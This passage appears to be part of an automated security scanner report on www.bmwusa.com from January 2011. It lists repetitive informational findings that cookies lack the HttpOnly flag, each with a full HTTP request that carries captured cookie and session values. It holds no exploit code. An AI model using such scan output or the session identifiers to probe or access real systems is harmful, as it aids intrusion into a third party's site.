The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328iconvertible/3seriesconvertiblemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:29:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:49:38 GMT;path=/
Content-Length: 202520


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.176. http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328iconvertible/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328iconvertible/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:29:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:49:20 GMT;path=/
Content-Length: 214887


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.177. http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328iconvertible/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328iconvertible/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:29:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:49:51 GMT;path=/
Content-Length: 226399


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.178. http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328iconvertible/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328iconvertible/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:29:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:49:23 GMT;path=/
Content-Length: 216239


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.179. http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/3seriescoupemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328icoupe/3seriescoupemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328icoupe/3seriescoupemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:19:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:39:58 GMT;path=/
Content-Length: 202158


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.180. http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328icoupe/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328icoupe/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:18:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:38:40 GMT;path=/
Content-Length: 212973


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.181. http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328icoupe/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328icoupe/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:07 GMT;path=/
Content-Length: 200604


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.182. http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328icoupe/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328icoupe/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:18:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:38:59 GMT;path=/
Content-Length: 215188


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.183. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/3seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328isedan/3seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328isedan/3seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:48:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:08:05 GMT;path=/
Content-Length: 201974


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.184. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328isedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328isedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:45 GMT;path=/
Content-Length: 214690


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.185. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328isedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328isedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:48:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:08:09 GMT;path=/
Content-Length: 225674


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.186. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328isedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328isedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:53 GMT;path=/
Content-Length: 215545


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.187. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/3seriessportswagonmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328isportswagon/3seriessportswagonmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328isportswagon/3seriessportswagonmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:35:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:55:48 GMT;path=/
Content-Length: 202357


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.188. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328isportswagon/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328isportswagon/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:35:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:55:00 GMT;path=/
Content-Length: 213889


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.189. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328isportswagon/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

